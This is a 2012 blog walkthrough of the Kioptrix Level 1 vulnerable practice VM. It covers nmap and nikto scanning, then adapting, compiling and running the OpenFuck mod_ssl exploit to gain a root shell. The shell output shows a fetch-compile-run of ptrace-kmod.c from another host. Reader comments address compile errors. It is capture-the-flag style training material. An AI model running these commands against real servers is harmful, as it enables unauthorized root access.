Sunday, 12 August 2012

Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)



Kioptrix Hacking challenge LEVEL 1 part 1 (APACHE)
Hi everyone, in this post I will be demonstrating how to hack Kioptrix Level 1 .But what is kioptrix? Its a linux distro with lots of vulnerabilities, so we can play and test our knowledgement. To download, go to : http://www.kioptrix.com/blog/?page_id=135  , and use vmware player to open the files and you are ready to go.So, now that's everything up and running, we need to discover the IP address of the target machine because it gets via DHCP from your network ( by the way, you need a DHCP server in order for this to work). To find out what's the IP address , lets run an nmap on our network that will look for live hosts.

# nmap -sn 172.16.1.0/24
Nmap scan report for 172.16.1.144
Host is up (0.0010s latency).
MAC Address: 00:50:56:AF:5A:B9 (VMware)

Great, now that we found it the IP address, lets see what's running in the host.

#nmap -sV 172.16.1.144


Starting Nmap 6.01 ( http://nmap.org ) at 2012-08-03 16:47 BST
Nmap scan report for 172.16.1.144
Host is up (0.033s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE              VERSION
22/tcp   open  ssh                  OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http                 Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind (rpcbind V2) 2 (rpc #100000)
139/tcp  open  netbios-ssn          Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/http             Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
1024/tcp open  status (status V1)   1 (rpc #100024)
MAC Address: 00:50:56:AF:5A:B9 (VMware)


Ok, at this point there is a lot to do. We need to find if the running version of each open port has an exploit for the version.To get the proper version and vulnerability ID, lets use nikto to scan the host. I am not going to explain all vulnerabilities of the distro, I think two is good enough, you guys can try for your self's other ways to break into. So I am going to show how to break in using apache and samba.
1) cd /pentest/web/nikto/
2) ./nikto.pl -host 172.16.1.144
3) The results (The intersting bits) :
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.


Right, now we need to google it for the CVEs or you can search for the exploit on backtrack itself.
Run:
/pentest/exploits/exploitdb/searchsploit  apache linux remote
Webfroot Shoutbox < 2.32 (Apache) Remote Exploit  /linux/remote/34.pl
Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl   /linux/remote/38.pl
Apache mod_gzip (with debug_mode) <= 1.2.26.1a Remote Exploit    /linux/remote/126.c
Apache 1.3.*-2.0.48 mod_userdir Remote Users Disclosure Exploit     /linux/remote/132.c
Apache OpenSSL Remote Exploit (Multiple Targets) (OpenFuckV2.c)/linux/remote/764.c
Apache Tomcat Connector (mod_jk) Remote  Exploit (exec-shield)     /linux/remote/4162.c
Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)     /linux/remote/4552.pl
Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit /linux/remote/5386.txt


As you can see, there is one for OpenSSL (764.c) OpenFuck.
Now, because this is really old, you need to change the exploit a bit in order to make it work.
1) Add: #include <openssl rc4.h>
2) Add: #include <openssl md5.h>
3) Search inside the exploit for "wget" and change the url for the correct one because that is not valid anymore. If you google it for ptrace-kmod.c , you will find that the correct address is :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
So, just change that on the exploit, save it .
Now we need to compile it, but before that, we need install the ssl-dev libraries.
Run :
apt-get install libssl-dev
cd /pentest/exploits/exploitdb/platforms/linux/remote
gcc -o OpenFuck 764.c -lcrypto
Run the exploit now
./OpenFuck
Look for the target, we know that its running apache on a redhat, and that is running 1.3.20 so lets filter that:
./OpenFuck  | grep -i redhat | grep "1.3.20"
That limits the results to only two
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
So we can try first the target as 0x6a and if that doesn't work, we can try 0x6b.
./OpenFuck 0x6a 172.16.1.144 443
Result :
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80fc3f0
Ready to send shellcode
Spawning shell...
Good Bye!

As you can see, that did not worked.
Lets try the other one now.
./OpenFuck 0x6b 172.16.1.144 443
Result:
Establishing SSL connection
cipher: 0x4043808c   ciphers: 0x80f83c0
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; ttp://172.16.1.79/ptrace-kmod.c; gcc -
--09:18:29--  http://172.16.1.79/ptrace-kmod.c          => `ptrace-kmod.c'
Connecting to 172.16.1.79:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]    0K ...                   100% @   3.74 MB/s
09:18:29 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
[+] Attached to 17426
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


Success !! We got root on the box.
In the next video I will demonstrate how to hack using samba.

2 comments:

  1. I get these errors when I try to compile it. I have added the headers to it and everything but it seems like my amazing C experience isn't helping ^,^ ...

    764.c:645:24: error: ‘SSL2_MAX_CONNECTION_ID_LENGTH’ undeclared here (not in a function)
    unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘read_ssl_packet’:
    764.c:847:19: error: ‘SSL2_MT_ERROR’ undeclared (first use in this function)
    if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
    ^~~~~~~~~~~~~
    764.c:847:19: note: each undeclared identifier is reported only once for each function it appears in
    764.c: In function ‘get_server_hello’:
    764.c:979:16: error: ‘SSL2_MT_SERVER_HELLO’ undeclared (first use in this function)
    if (*(p++) != SSL2_MT_SERVER_HELLO) {
    ^~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_master_key’:
    764.c:1071:10: error: dereferencing pointer to incomplete type ‘EVP_PKEY {aka struct evp_pkey_st}’
    if (pkey->type != EVP_PKEY_RSA) {
    ^~
    764.c: In function ‘get_server_verify’:
    764.c:1148:16: error: ‘SSL2_MT_SERVER_VERIFY’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_VERIFY) {
    ^~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘send_client_finished’:
    764.c:1160:11: error: ‘SSL2_MT_CLIENT_FINISHED’ undeclared (first use in this function)
    buf[0] = SSL2_MT_CLIENT_FINISHED;
    ^~~~~~~~~~~~~~~~~~~~~~~
    764.c: In function ‘get_server_finished’:
    764.c:1173:16: error: ‘SSL2_MT_SERVER_FINISHED’ undeclared (first use in this function)
    if (buf[0] != SSL2_MT_SERVER_FINISHED) {

    ReplyDelete
    Replies
    1. You need to install apt-get install libssl1.0-dev

      I had the same issue!!

      Delete